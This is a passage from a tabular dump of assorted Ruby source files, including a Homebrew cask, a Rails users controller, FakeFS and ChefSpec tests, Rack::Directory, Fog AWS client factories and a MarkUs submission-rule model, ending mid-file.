hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
87b077cc9936e45fbbb59f887fd8163f66fc27f5 | 220 | cask :v1 => 'r-name' do
# Homebrew Cask (legacy v1 DSL) for the R-Name batch file renamer.
# :latest / :no_check — the vendor serves an unversioned archive, so there
# is no fixed version or checksum to pin.
version :latest
sha256 :no_check
url 'http://www.jacek-dom.net/software/R-Name/R-Name.app.zip'
homepage 'http://www.jacek-dom.net/software/R-Name/'
license :gpl
app 'R-Name.app'
end
| 20 | 63 | 0.672727 |
f85000bbb810e26b0d77ba73758fb73304887b4c | 1,198 | # rubocop:disable Style/UnlessElse
class UsersController < ApplicationController
  # Require a valid token for every action except the public auth endpoints.
  before_action :authenticate_request, except: %i[login register]

  # GET /index — lists every user (no pagination).
  def index
    render json: User.all
  end

  # POST /login — delegates credential checking to AuthenticateUser.
  def login
    authenticate params[:email], params[:password]
  end

  # GET /test — only reachable with a valid token; auth smoke test.
  def test
    render json: {
      message: 'You have passed authentication and authorization test'
    }
  end

  # POST /register
  def register
    # Build without persisting so validations/INSERT run exactly once on
    # save. (The original used User.create followed by @user.save, which
    # validated and attempted to persist the record twice.)
    @user = User.new(user_params)
    if @user.save
      response = { message: 'User created successfully' }
      render json: response, status: :created
    else
      # Bug fix: :bad is not a recognised Rack status symbol and raises at
      # render time; :bad_request maps to HTTP 400.
      render json: @user.errors, status: :bad_request
    end
  end

  private

  # Runs the AuthenticateUser command and renders either the token payload
  # or a 401 carrying the command's error list.
  def authenticate(email, password)
    command = AuthenticateUser.new(email, password)
    command = command.call
    if command[:authenticate_errors]
      render json: { error: command[:authenticate_errors] }, status: :unauthorized
    else
      render json: {
        access_token: command[:token],
        user: command[:user],
        message: 'Login Successful'
      }
    end
  end

  # Strong parameters for registration.
  def user_params
    params.permit(
      :name,
      :email,
      :password,
      :username
    )
  end
end
# rubocop:enable Style/UnlessElse
| 20.305085 | 82 | 0.657763 |
f7d99e0d099bc05df361e4b929106885765b8418 | 1,149 | require_relative 'test_helper'
# Kernel test class
# Kernel test class
#
# Exercises FakeFS's override of Kernel#open: pipe-opens must keep spawning
# real subprocesses both with FakeFS off and inside a FakeFS block, while
# path-opens inside FakeFS must hit the in-memory filesystem.
class KernelTest < Minitest::Test
include FakeFS
# Each test starts against the real filesystem; fake behaviour is opted
# into per-test via FakeFS { ... } blocks.
def setup
FakeFS.deactivate!
end
# Restore FakeFS afterwards so other suites see the default state.
def teardown
FakeFS.activate!
end
# Kernel#open with a leading '|' spawns a real subprocess when FakeFS is off.
def test_can_exec_normally
out = open("|echo 'foo'")
assert_equal "foo\n", out.gets
end
# Pipe-opens must still reach the real OS even inside a FakeFS block.
def test_fake_kernel_can_create_subprocesses
FakeFS do
out = open("|echo 'foo'")
assert_equal "foo\n", out.gets
end
end
# Path-opens inside FakeFS create entries in the fake filesystem tree.
def test_fake_kernel_can_create_new_file
FakeFS do
FileUtils.mkdir_p '/path/to/'
open('/path/to/file', 'w') do |f|
f << 'test'
end
assert_kind_of FakeFile, FileSystem.fs['path']['to']['file']
end
end
# Round trip: File.open to write, then Kernel#open to read, all inside FakeFS.
def test_fake_kernel_can_do_stuff
FakeFS do
FileUtils.mkdir_p('/tmp')
File.open('/tmp/a', 'w+') { |f| f.puts 'test' }
begin
open('/tmp/a').read
rescue StandardError => e
raise e
end
end
end
# The Kernel#open patch must not leak `open` as a public instance method.
def test_kernel_open_remains_private
refute 'foo'.respond_to?(:open), 'String#open should be private'
end
# Duplicate of test_can_exec_normally — presumably guards against state
# leaking out of the FakeFS tests above; confirm intent before removing.
def test_can_exec_normally2
out = open("|echo 'foo'")
assert_equal "foo\n", out.gets
end
end
| 19.810345 | 68 | 0.635335 |
62093e075a6b01c15d58b3f1199e647143df77e0 | 309 | class ApplicationController < ActionController::Base
protect_from_forgery with: :exception
include SessionsHelper
private
# Confirms a logged-in user
# Before-filter for actions that need authentication: remembers the
# requested URL (store_location, from SessionsHelper) so the user can be
# sent back after signing in, then redirects to login with a flash warning.
def logged_in_user
unless logged_in?
store_location
flash[:danger] = "Please log in"
redirect_to login_url
end
end
end
| 19.3125 | 52 | 0.728155 |
bf5a097d75bea74469b7cefe83e285c47320af82 | 6,127 | module MesscadaApp
# Service that force-stages a single RMT bin against a presort staging run
# child, bypassing the normal staging scan flow while still enforcing all
# bin validity checks. Returns a BaseService success/failed response.
class ForceBinStaging < BaseService
attr_reader :repo, :delivery_repo, :locn_repo, :messcada_repo, :bin_number, :plant_resource_code, :presort_staging_run_id, :presort_staging_run_child_id, :bin, :staging_run
# bin_number   - asset number of the bin to stage.
# child_run_id - id of the presort_staging_run_children row to stage against.
# The parent run id and its flat record are resolved eagerly so all
# validators below can use them.
def initialize(bin_number, child_run_id)
@repo = RawMaterialsApp::PresortStagingRunRepo.new
@delivery_repo = RawMaterialsApp::RmtDeliveryRepo.new
@locn_repo = MasterfilesApp::LocationRepo.new
@messcada_repo = MesscadaApp::MesscadaRepo.new
@bin_number = bin_number
@presort_staging_run_child_id = child_run_id
@presort_staging_run_id = @repo.get(:presort_staging_run_children, :presort_staging_run_id, child_run_id)
@staging_run = repo.find_presort_staging_run_flat(@presort_staging_run_id)
@plant_resource_code = @staging_run[:plant_resource_code]
end
# Validates the bin and stages it inside a transaction; any StandardError
# is converted into a failed_response.
def call
errors = valid_bin?(bin_number)
return failed_response(errors.join(', ')) if errors
repo.transaction do
StageBins.call([bin_number], plant_resource_code, presort_staging_run_child_id)
success_response("Bin: #{bin_number} staged against run: #{presort_staging_run_id}, child: #{presort_staging_run_child_id} successfully")
end
rescue StandardError => e
failed_response(e.message)
end
private
# Returns an array of error strings, or nil when the bin is valid.
# Side effect: bin_exists? memoises the bin record into @bin, which the
# other checks below depend on — call order matters here.
def valid_bin?(asset_number) # rubocop:disable Metrics/AbcSize, Metrics/CyclomaticComplexity, Metrics/PerceivedComplexity
err = bin_exists?(asset_number)
return [err] unless err.nil?
errors = []
err = validate_location(asset_number)
errors << err unless err.nil?
check = messcada_repo.check_bin_in_wip(asset_number)
errors << check.message unless check.success
delivery_id = repo.get_value(:rmt_bins, :rmt_delivery_id, bin_asset_number: asset_number)
unless delivery_id.nil_or_empty?
res = QualityApp::FailedAndPendingMrlResults.call(delivery_id)
errors << res.message unless res.success
end
errs = valid_bin_for_active_parent_run?
errors += errs unless errs.nil?
err = rebin?(asset_number)
errors << err unless err.nil?
err = not_on_sale?(asset_number)
errors << err unless err.nil?
err = valid_bin_for_active_child_run?(asset_number)
errors << err unless err.nil?
# nil when no errors — the caller treats nil as "valid".
errors unless errors.empty?
end
# Rebins may not be force-staged.
def rebin?(asset_number)
return "Bin: #{asset_number} is a rebin" if bin[:production_run_rebin_id]
end
# Bins attached to a bin load (on sale) may not be force-staged.
def not_on_sale?(asset_number)
return "Bin: #{asset_number} is on sale" if bin[:bin_load_product_id]
end
# Looks up and memoises the bin record (@bin); rejects missing, tipped or
# shipped bins.
def bin_exists?(asset_number)
@bin = repo.find_bin_record_by_asset_number(asset_number)
return "Bin:#{asset_number} does not exist" unless bin
return "Bin:#{asset_number} has been tipped" unless bin[:tipped_asset_number].nil_or_empty?
return "Bin:#{asset_number} has been shipped" unless bin[:shipped_asset_number].nil_or_empty?
end
# The bin's current location may not fall under any of the configured
# invalid staging locations.
def validate_location(asset_number)
AppConst::CR_RMT.invalid_presort_bin_staging_locations.each do |l|
locn_id = repo.get_value(:locations, :id, location_long_code: l)
return "Invalid bin location. Bin:#{asset_number} is from #{l}" if locn_repo.belongs_to_parent?(bin[:location_id], locn_id)
end
nil
end
# The bin's farm must match the child run's farm; farm '0P' is treated as
# a wildcard that accepts any bin.
def valid_bin_for_active_child_run?(asset_number)
run_farm_code = repo.child_run_farm(presort_staging_run_child_id)
bin_farm_code = repo.bin_farm(asset_number)
return "Bin:#{asset_number} belongs to farm [#{bin_farm_code}], but child_run's farm is [#{run_farm_code}]." unless bin_farm_code == run_farm_code || run_farm_code == '0P'
end
# format() template: attribute name, bin value, run value.
VALID_BIN_ERROR_MSG = '%s is %s on bin, but %s on run.'.freeze
# Compares bin attributes against the parent run. Attributes that are
# optional on the run (colour, treatments, rmt code/class/size) are only
# checked when the run has them set. Returns an array of errors or nil.
def valid_bin_for_active_parent_run? # rubocop:disable Metrics/AbcSize, Metrics/CyclomaticComplexity, Metrics/PerceivedComplexity
errs = []
errs << format(VALID_BIN_ERROR_MSG, 'season_code', bin.season_code || 'blank', staging_run.season_code || 'blank') if bin.season_id != staging_run.season_id
errs << format(VALID_BIN_ERROR_MSG, 'cultivar_name', bin.cultivar_name || 'blank', staging_run.cultivar_name || 'blank') if bin.cultivar_id != staging_run.cultivar_id
errs << format(VALID_BIN_ERROR_MSG, 'colour', bin.colour_percentage || 'blank', staging_run.colour_percentage || 'blank') if staging_run.colour_percentage_id && bin.colour_percentage_id != staging_run.colour_percentage_id
errs << format(VALID_BIN_ERROR_MSG, 'cold_treatment_code', bin.actual_cold_treatment_code || 'blank', staging_run.actual_cold_treatment_code || 'blank') if staging_run.actual_cold_treatment_id && bin.actual_cold_treatment_id != staging_run.actual_cold_treatment_id
errs << format(VALID_BIN_ERROR_MSG, 'ripeness_treatment_code', bin.actual_ripeness_treatment_code || 'blank', staging_run.actual_ripeness_treatment_code || 'blank') if staging_run.actual_ripeness_treatment_id && bin.actual_ripeness_treatment_id != staging_run.actual_ripeness_treatment_id
errs << format(VALID_BIN_ERROR_MSG, 'rmt_code', bin.rmt_code || 'blank', staging_run.rmt_code || 'blank') if staging_run.rmt_code_id && bin.rmt_code_id != staging_run.rmt_code_id
errs << format(VALID_BIN_ERROR_MSG, 'rmt_class_code', bin.class_code || 'blank', staging_run.rmt_class_code || 'blank') if staging_run.rmt_class_id && bin.rmt_class_id != staging_run.rmt_class_id
errs << format(VALID_BIN_ERROR_MSG, 'size_code', bin.size_code || 'blank', staging_run.size_code || 'blank') if staging_run.rmt_size_id && bin.rmt_size_id != staging_run.rmt_size_id
errs << "bin location_code[#{bin.location_long_code}] is not in [#{AppConst::CR_RMT.valid_presort_bin_staging_locations.join(' ')}]" unless valid_bin_location_for_staging?
return errs unless errs.empty?
end
# True when the bin's location falls under any configured valid staging
# location.
def valid_bin_location_for_staging?
AppConst::CR_RMT.valid_presort_bin_staging_locations.each do |l|
locn_id = repo.get_value(:locations, :id, location_long_code: l)
return true if locn_repo.belongs_to_parent?(bin[:location_id], locn_id)
end
false
end
end
end
| 51.923729 | 294 | 0.739187 |
d57c9d31d131ee79228df4b3531097e0fc7bffdd | 1,882 | # frozen_string_literal: true
require 'rake/tasklib'
require 'ansible-ruby'
require 'ansible/ruby/rake/task_util'
require 'ansible/ruby/rake/compile'
require 'ansible/ruby/rake/clean'
module Ansible
module Ruby
module Rake
# Rake task factory: given a task name it defines three tasks —
# <name> (runs ansible-playbook on the compiled YAML), <name>_compile
# (transpiles the Ruby playbooks to YAML) and <name>_clean (removes the
# generated YAML). Configure via the yielded block (playbooks/options).
class Execute < ::Rake::TaskLib
include TaskUtil
# :reek:Attribute - Rake DSL gets ugly if we don't use a block
attr_writer :playbooks
# :reek:Attribute - Rake DSL gets ugly if we don't use a block
attr_accessor :options
# parameters - task name, or a `name => deps` hash (Rake convention).
# Yields self so callers can set playbooks/options, then wires up the
# run, compile and clean tasks.
def initialize(parameters = :default)
name, deps = parse_params parameters
yield self if block_given?
raise 'You did not supply any playbooks!' unless playbooks.any?
deps ||= []
compile_task_name = "#{name}_compile".to_sym
# The compile task is always appended as a dependency of the run task.
deps = [*deps] << compile_task_name
playbook_yml_files = yaml_filenames playbooks
task name => deps do
flat = flat_options
flat += ' ' unless flat.empty?
sh "ansible-playbook #{flat}#{playbook_yml_files.join ' '}"
end
symbol = name.inspect.to_s
desc "Compiles YAML files for #{symbol} task"
# Role task/handler files are compiled alongside the playbooks.
compiled_files = playbooks + nested_files
Compile.new compile_task_name do |compile_task|
compile_task.files = compiled_files
end
desc "Cleans YAML files for #{symbol} task"
Clean.new "#{name}_clean".to_sym do |clean_task|
clean_task.files = compiled_files
end
end
private
# Normalises the (possibly single/nil) playbooks attribute to an array.
def playbooks
[*@playbooks]
end
# Ruby sources inside role tasks/handlers that also need transpiling.
def nested_files
FileList['roles/*/tasks/**/*.rb',
'roles/*/handlers/**/*.rb']
end
# Joins configured options with any ANSIBLE_OPTS from the environment.
def flat_options
array = [*options] << ENV['ANSIBLE_OPTS']
array.compact.join ' '
end
end
end
end
end
| 28.953846 | 73 | 0.587673 |
6a4ed6ba084d61f6e47d30552d5ceeaa7f86ceac | 1,382 | ActionController::Routing::Routes.draw do |map|
# Legacy (Rails 2.x) routing DSL.
# /admin namespace: user administration with POST /admin/users/search.
map.namespace :admin do |a|
a.resources :users, :collection => {:search => :post}
end
# Profiles expose the social sub-resources via :has_many, plus nested
# video management with wall/converted callbacks.
map.resources :profiles, :member=>{:delete_icon=>:post}, :collection=>{:search=>:get}, :has_many => [:friends, :blogs, :photos, :comments, :feed_items, :messages] do |profiles|
profiles.resources :videos, :collection => {:wall => :post}, :member => {:converted => :post}
end
map.resources :messages, :collection => {:sent => :get}
map.resources :blogs do |blog|
blog.resources :comments
end
# Forums -> topics -> posts; update_positions supports forum reordering.
map.resources :forums, :collection => {:update_positions => :post} do |forum|
forum.resources :topics, :controller => :forum_topics do |topic|
topic.resources :posts, :controller => :forum_posts
end
end
# Named authentication routes, all served by AccountsController.
map.with_options(:controller => 'accounts') do |accounts|
accounts.login "/login", :action => 'login'
accounts.logout "/logout", :action => 'logout'
accounts.signup "/signup", :action => 'signup'
end
# Root, RSS feeds and static-ish pages served by HomeController.
map.with_options(:controller => 'home') do |home|
home.home '/', :action => 'index'
home.latest_comments '/latest_comments.rss', :action => 'latest_comments', :format=>'rss'
home.newest_members '/newest_members.rss', :action => 'newest_members', :format=>'rss'
home.tos '/tos', :action => 'terms'
home.contact '/contact', :action => 'contact'
end
end
| 37.351351 | 178 | 0.649059 |
03915be6996ffa215e9af74b4b28c2ceeebf4101 | 110 | $LOAD_PATH.unshift File.expand_path("../../lib", __FILE__)
require "nanoboxifier"
require "minitest/autorun"
| 22 | 58 | 0.754545 |
ab02bfd5c22e237fdbc5ad09d75c6fa2f8fa603a | 157 | class CreateCarts < ActiveRecord::Migration
# Migration: carts table linking a user to a store.
# NOTE(review): store_id/user_id are plain integer columns with no index or
# foreign-key constraint — confirm whether references/indexes were intended.
def change
create_table :carts do |t|
t.integer :store_id
t.integer :user_id
end
end
end
| 17.444444 | 43 | 0.675159 |
f80a6b8b56cb4332d24748c6dbd57d4468b0b0ce | 1,923 | require 'spec_helper'
require 'dea/utils/upload'
# Specs for Upload#upload!: multipart-uploads a local file to a URL inside
# an EventMachine reactor (the `em`/`start_http_server` helpers come from
# spec_helper and drive a tiny in-process HTTP server on port 12345).
describe Upload do
# A closed Tempfile with known contents to upload.
let(:file_to_upload) do
file_to_upload = Tempfile.new("file_to_upload")
file_to_upload << "This is the file contents"
file_to_upload.close
file_to_upload
end
subject { Upload.new(file_to_upload.path, "http://127.0.0.1:12345/") }
describe "#upload!" do
# Every example runs inside the EM reactor; `done` ends the example.
around do |example|
em { example.call }
end
context "when uploading successfully" do
it "uploads a file" do
uploaded_contents = ""
start_http_server(12345) do |connection, data|
uploaded_contents << data
connection.send_data("HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n")
end
subject.upload! do |error|
error.should be_nil
# The raw request body must contain the multipart boundary markers
# wrapping the file contents.
uploaded_contents.should match(/.*multipart-boundary-.*Content-Disposition.*This is the file contents.*multipart-boundary-.*/m)
done
end
end
end
# No server listening: the callback receives a connection-level error.
context "when there is no server running" do
it "calls the block with the exception" do
subject.upload! do |error|
error.should be_a(Upload::UploadError)
error.message.should == "Error uploading: http://127.0.0.1:12345/ (Response status: unknown)"
done
end
end
end
# Server responds but with a 500: the error carries the HTTP status.
context "when you get a 500" do
it "calls the block with the exception" do
start_http_server(12345) do |connection, data|
body = ""
connection.send_data("HTTP/1.1 500\r\n")
connection.send_data("Content-Length: #{body.length}\r\n")
connection.send_data("\r\n")
connection.send_data(body)
connection.send_data("\r\n")
end
subject.upload! do |error|
error.should be_a(Upload::UploadError)
error.message.should match %r{Error uploading: http://127.0.0.1:12345/ \(HTTP status: 500}
done
end
end
end
end
end
| 29.584615 | 137 | 0.618305 |
79ac55c195c42d9782b98e6e498775c6775f60a8 | 1,784 | class Spa < ApplicationRecord
has_many :technicians, :dependent => :delete_all
has_many :treatments
has_many :appointments, :through => :treatments
validates :name, :presence => true
validates :phone_number, :presence => true
scope :by_zipcode, -> (zipcode) { where("zip = ?", zipcode)}
def available_timeslots
available_times = []
half_hours_array = datetime_array_for_each_working_half_hour
half_hours_array.each_with_index do |half_hours, index|
if self.appointments.find_by(appointment_time: half_hours)
elsif appointment = self.appointments.find_by(appointment_time: half_hours_array[index-1])
if appointment.treatment.duration == 60
else
available_times << data_for_datetime_array(half_hours)
end
else
available_times << data_for_datetime_array(half_hours)
end
end
available_times
end
private
def datetime_array_for_next_seven_days_at_midnight
days_array = []
day_counter = 1
7.times do
days_array << (Time.now + day_counter.days).at_midnight
day_counter += 1
end
days_array
end
def datetime_array_for_each_working_half_hour
half_hours_array = []
datetime_array_for_next_seven_days_at_midnight.each do |day|
half_hour_counter = 9.to_f
17.times do
half_hours_array << (day + half_hour_counter.hours)
half_hour_counter += 0.5
end
end
half_hours_array
end
def data_for_datetime_array(half_hours)
[half_hours.strftime("%A, %B %e, %Y - %l:%M %P"), half_hours]
end
end
| 31.857143 | 102 | 0.622758 |
0366eff141b363134c4ebb847fef221e0424c1e6 | 4,306 | require 'time'
require 'rack/utils'
require 'rack/mime'
module Rack
# Rack::Directory serves entries below the +root+ given, according to the
# path info of the Rack request. If a directory is found, the file's contents
# will be presented in an html based index. If a file is found, the env will
# be passed to the specified +app+.
#
# If +app+ is not specified, a Rack::File of the same +root+ will be used.
class Directory
# Row template: href, name, size, MIME type, mtime.
DIR_FILE = "<tr><td class='name'><a href='%s'>%s</a></td><td class='size'>%s</td><td class='type'>%s</td><td class='mtime'>%s</td></tr>"
DIR_PAGE = <<-PAGE
<html><head>
  <title>%s</title>
  <meta http-equiv="content-type" content="text/html; charset=utf-8" />
  <style type='text/css'>
table { width:100%%; }
.name { text-align:left; }
.size, .mtime { text-align:right; }
.type { width:11em; }
.mtime { width:15em; }
  </style>
</head><body>
<h1>%s</h1>
<hr />
<table>
  <tr>
    <th class='name'>Name</th>
    <th class='size'>Size</th>
    <th class='type'>Type</th>
    <th class='mtime'>Last Modified</th>
  </tr>
%s
</table>
<hr />
</body></html>
PAGE
attr_reader :files
attr_accessor :root, :path
def initialize(root, app=nil)
@root = F.expand_path(root)
@app = app || Rack::File.new(@root)
end
# Each request is handled on a dup so per-request ivars don't race.
def call(env)
dup._call(env)
end
F = ::File
def _call(env)
@env = env
@script_name = env[SCRIPT_NAME]
@path_info = Utils.unescape(env[PATH_INFO])
if forbidden = check_forbidden
forbidden
else
@path = F.join(@root, @path_info)
list_path
end
end
# Path-traversal guard: any ".." in the path is rejected with a 403.
# X-Cascade lets an enclosing cascade try the next app.
def check_forbidden
return unless @path_info.include? ".."
body = "Forbidden\n"
size = Rack::Utils.bytesize(body)
return [403, {"Content-Type" => "text/plain",
CONTENT_LENGTH => size.to_s,
"X-Cascade" => "pass"}, [body]]
end
# Builds @files ([url, name, size, type, mtime] rows, dotfiles skipped)
# and returns a 200 whose body is `self` (streamed via #each below).
def list_directory
@files = [['../','Parent Directory','','','']]
url_head = (@script_name.split('/') + @path_info.split('/')).map do |part|
Rack::Utils.escape part
end
Dir.entries(path).reject { |e| e.start_with?('.') }.sort.each do |node|
# NOTE(review): stat receives the bare entry name, so File.stat resolves
# it relative to the process CWD rather than @path — confirm this is the
# intended behaviour (entries that don't exist in CWD are skipped).
stat = stat(node)
next unless stat
basename = F.basename(node)
ext = F.extname(node)
url = F.join(*url_head + [Rack::Utils.escape(basename)])
size = stat.size
type = stat.directory? ? 'directory' : Mime.mime_type(ext)
size = stat.directory? ? '-' : filesize_format(size)
mtime = stat.mtime.httpdate
url << '/' if stat.directory?
basename << '/' if stat.directory?
@files << [ url, basename, size, type, mtime ]
end
return [ 200, { CONTENT_TYPE =>'text/html; charset=utf-8'}, self ]
end
# nil on missing files or symlink loops. The `max` parameter is unused —
# presumably a historical symlink-depth limit.
def stat(node, max = 10)
F.stat(node)
rescue Errno::ENOENT, Errno::ELOOP
return nil
end
# TODO: add correct response if not readable, not sure if 404 is the best
# option
def list_path
@stat = F.stat(@path)
if @stat.readable?
return @app.call(@env) if @stat.file?
return list_directory if @stat.directory?
else
raise Errno::ENOENT, 'No such file or directory'
end
rescue Errno::ENOENT, Errno::ELOOP
return entity_not_found
end
def entity_not_found
body = "Entity not found: #{@path_info}\n"
size = Rack::Utils.bytesize(body)
return [404, {"Content-Type" => "text/plain",
CONTENT_LENGTH => size.to_s,
"X-Cascade" => "pass"}, [body]]
end
# Response-body protocol: renders the index page and yields it line by line.
def each
show_path = Rack::Utils.escape_html(@path.sub(/^#{@root}/,''))
files = @files.map{|f| DIR_FILE % DIR_FILE_escape(*f) }*"\n"
page  = DIR_PAGE % [ show_path, show_path , files ]
page.each_line{|l| yield l }
end
# Stolen from Ramaze
FILESIZE_FORMAT = [
['%.1fT', 1 << 40],
['%.1fG', 1 << 30],
['%.1fM', 1 << 20],
['%.1fK', 1 << 10],
]
# Human-readable size: largest matching unit, else raw bytes.
def filesize_format(int)
FILESIZE_FORMAT.each do |format, size|
return format % (int.to_f / size) if int >= size
end
int.to_s + 'B'
end
private
# Assumes url is already escaped.
def DIR_FILE_escape url, *html
[url, *html.map { |e| Utils.escape_html(e) }]
end
end
end
| 25.784431 | 140 | 0.574779 |
182c35596445eae0085836795a67eec0982865e6 | 287 | cask 'inc' do
# :latest / :no_check — upstream serves an unversioned zip, so there is no
# fixed version or checksum to pin.
version :latest
sha256 :no_check
# amazonaws.com is the official download host per the vendor homepage
url 'http://inc-static.kippt.com.s3.amazonaws.com/apps/inc-osx.zip'
name 'Inc'
homepage 'https://sendtoinc.com/apps/'
license :gratis
app 'Inc.app'
end
| 22.076923 | 71 | 0.714286 |
ac1f1a620d2552a87d3d20a36770c9b14503999e | 2,573 | require 'fog'
module Muggy
# Memoised factories for Fog AWS service clients, one per service, all
# bound to the global Muggy.region. Each `foo` accessor is memoised (via
# Muggy::Support::Memoisation's `memoised`) over the bang method `foo!`,
# and each service also has a `*_for_region` variant for explicit regions.
module Fog
include Muggy::Support::Memoisation
extend self
# assumptions: Muggy.use_iam? is defined
# reset service instances.
# Used to reset memoised values if the global region's changed.
def reset_services!
%w{
auto_scaling
cache
cfn
cw
ec2
elb
iam
rds
r53
s3
}.each do |key|
clear_memoised_value!(key)
end
end
# services
memoised :ec2
def ec2!
ec2_for_region(Muggy.region)
end
def ec2_for_region(region)
::Fog::Compute.new(provider: 'AWS', region: Muggy.formal_region(region), use_iam_profile: Muggy.use_iam?)
end
memoised :elb
def elb!
elb_for_region(Muggy.region)
end
def elb_for_region(region)
::Fog::AWS::ELB.new(region: Muggy.formal_region(region), use_iam_profile: Muggy.use_iam?)
end
memoised :cache
def cache!
cache_for_region(Muggy.region)
end
def cache_for_region(region)
::Fog::AWS::Elasticache.new(region: Muggy.formal_region(region), use_iam_profile: Muggy.use_iam?)
end
memoised :cfn
def cfn!
cfn_for_region(Muggy.region)
end
def cfn_for_region(region)
::Fog::AWS::CloudFormation.new(region: Muggy.formal_region(region), use_iam_profile: Muggy.use_iam?)
end
memoised :s3
def s3!
s3_for_region(Muggy.region)
end
def s3_for_region(region)
::Fog::Storage.new(provider: 'AWS', region: Muggy.formal_region(region), use_iam_profile: Muggy.use_iam?)
end
memoised :cw
def cw!
cloudwatch_for_region(Muggy.region)
end
def cloudwatch_for_region(region)
::Fog::AWS::CloudWatch.new(region: Muggy.formal_region(region), use_iam_profile: Muggy.use_iam?)
end
memoised :rds
def rds!
rds_for_region(Muggy.region)
end
def rds_for_region(region)
::Fog::AWS::RDS.new(region: Muggy.formal_region(region), use_iam_profile: Muggy.use_iam?)
end
memoised :auto_scaling
def auto_scaling!
auto_scaling_for_region(Muggy.region)
end
def auto_scaling_for_region(region)
::Fog::AWS::AutoScaling.new(region: Muggy.formal_region(region), use_iam_profile: Muggy.use_iam?)
end
#################
#  region free  #
#################
memoised :r53
def r53!
::Fog::DNS.new(provider: 'AWS', use_iam_profile: Muggy.use_iam?)
end
memoised :iam
# NOTE(review): unlike every other factory in this module, iam! passes no
# use_iam_profile (or any other options) to the constructor — confirm
# whether IAM is intentionally exempt from the instance-profile setting.
def iam!
::Fog::AWS::IAM.new()
end
end
end
| 19.792308 | 111 | 0.630004 |
acba9cd6f7085ccc70e5173d50aa7c261befa04c | 3,537 | require 'spec_helper'
require 'f5/icontrol'
require_relative '../../../libraries/vip'
require_relative '../../../libraries/credentials'
require_relative '../../../libraries/dns_lookup'
require_relative '../../../libraries/gem_helper'
# ChefSpec coverage for the f5_vip resource: steps into the provider and
# verifies VIP creation against a fully stubbed F5 iControl API.
describe 'f5_test::test_create_vip_name' do
let(:api) { double('F5::Icontrol') }
let(:server_api) { double('F5::Icontrol::LocalLB::VirtualServer') }
# step_into makes ChefSpec execute the f5_vip provider code rather than
# just asserting the resource was declared.
let(:chef_run) do
ChefSpec::SoloRunner.new(
platform: 'centos',
version: '7.2.1511',
step_into: ['f5_vip']
) do |node|
node.normal[:f5][:credentials][:default] = {
host: '1.2.3.4',
username: 'api',
password: 'testing'
}
end.converge(described_recipe)
end
# Common stubs: the iControl client, credentials data bag, and baseline
# virtual-server responses used by every example.
before do
allow(F5::Icontrol::API).to receive(:new) { api }
allow(api)
.to receive_message_chain('LocalLB.VirtualServer') { server_api }
allow_any_instance_of(Chef::RunContext::CookbookCompiler)
.to receive(:compile_libraries).and_return(true)
stub_data_bag_item('f5', 'default')
.and_return(host: '1.2.3.4', username: 'api', password: 'testing')
allow(server_api).to receive(:get_rule).and_return({item: {}})
allow(server_api).to receive(:get_destination_v2) {
{ item: { address: '86.75.30.9', port: '80' } }
}
end
context 'when managing the vip' do
before do
# these vips have no profiles
allow(server_api).to receive(:get_profile) {
{ item: { item: [] } }
}
# these vips have their SAT set to None
allow(server_api)
.to receive(:get_source_address_translation_type) {
{ item: [
F5::Icontrol::LocalLB::VirtualServer::SourceAddressTranslationType::SRC_TRANS_NONE
]}}
end
# If the VIP's hostname does not resolve, the provider bails out early.
context 'and the name hasnt been created yet' do
it 'skips all the work' do
allow_any_instance_of(DNSLookup)
.to receive(:address).and_return(nil)
expect(server_api).to_not receive(:create)
chef_run
end
end
# No existing VIPs on the device: the provider must create one using the
# resolved address.
context 'and the vip does not exist' do
before do
allow(server_api).to receive(:get_list) {
{ item: [] }
}
end
it 'creates the vip' do
allow_any_instance_of(ChefF5::VIP)
.to receive(:vip_default_pool).and_return('reallybasic')
allow_any_instance_of(DNSLookup)
.to receive(:address).and_return('90.2.1.0')
allow(server_api).to receive(:get_destination_v2) {
{ item: { address: '90.2.1.0', port: '80' } }
}
expect(server_api).to receive(:create) do |args|
expect(args[:definitions][:item][:address]).to eq '90.2.1.0'
end
expect(server_api).to receive(:set_type)
expect(chef_run).to create_f5_vip('myvip').with(
address: 'github.com',
port: '80',
protocol: 'PROTOCOL_TCP',
pool: 'reallybasic'
)
end
end
# VIP already present: converging must not issue a create call.
context 'and the vip already exists' do
before do
allow(server_api).to receive(:get_list) {
{ item: ['/Common/myvip'] }
}
allow_any_instance_of(DNSLookup)
.to receive(:address).and_return('90.2.1.0')
allow(server_api).to receive(:get_destination_v2) {
{ item: { address: '90.2.1.0', port: '80' } }
}
end
it 'does not create the vip' do
allow_any_instance_of(ChefF5::VIP).to receive(:vip_default_pool)
allow_any_instance_of(ChefF5::VIP).to receive(:set_vip_pool)
chef_run
end
end
end
end
| 28.756098 | 96 | 0.60475 |
ac977c7361f0199150789dec21aecf7224fdc879 | 3,860 | class SubmissionRule < ActiveRecord::Base
class InvalidRuleType < Exception
def initialize(rule_name)
super I18n.t('assignment.not_valid_submission_rule', type: rule_name)
end
end
belongs_to :assignment, inverse_of: :submission_rule
has_many :periods, -> { order('id') }, dependent: :destroy
accepts_nested_attributes_for :periods, allow_destroy: true
# validates_associated :assignment
# validates_presence_of :assignment
def self.descendants
[NoLateSubmissionRule,
PenaltyPeriodSubmissionRule,
PenaltyDecayPeriodSubmissionRule,
GracePeriodSubmissionRule]
end
def can_collect_now?
return @can_collect_now if !@can_collect_now.nil?
@can_collect_now = Time.zone.now >= get_collection_time
end
def can_collect_grouping_now?(grouping)
Time.zone.now >= calculate_grouping_collection_time(grouping)
end
# Cache that allows us to quickly get collection time
def get_collection_time
return @get_collection_time if !@get_collection_time.nil?
@get_collection_time = calculate_collection_time
end
def calculate_collection_time
assignment.latest_due_date + hours_sum.hours
end
def calculate_grouping_collection_time(grouping)
if grouping.inviter.section
SectionDueDate.due_date_for(grouping.inviter.section,
assignment)
else
assignment.due_date + hours_sum.hours
end
end
# When Students commit code after the collection time, MarkUs should warn
# the Students with a message saying that the due date has passed, and the
# work they're submitting will probably not be graded
def commit_after_collection_message
#I18n.t 'submission_rules.submission_rule.commit_after_collection_message'
raise NotImplementedError.new('SubmissionRule: commit_after_collection_message not implemented')
end
# When Students view the File Manager after the collection time,
# MarkUs should warnthe Students with a message saying that the
# due date has passed, and that any work they're submitting will
# probably not be graded
def after_collection_message
raise NotImplementedError.new('SubmissionRule: after_collection_message not implemented')
end
# When we're past the due date, the File Manager for the students will display
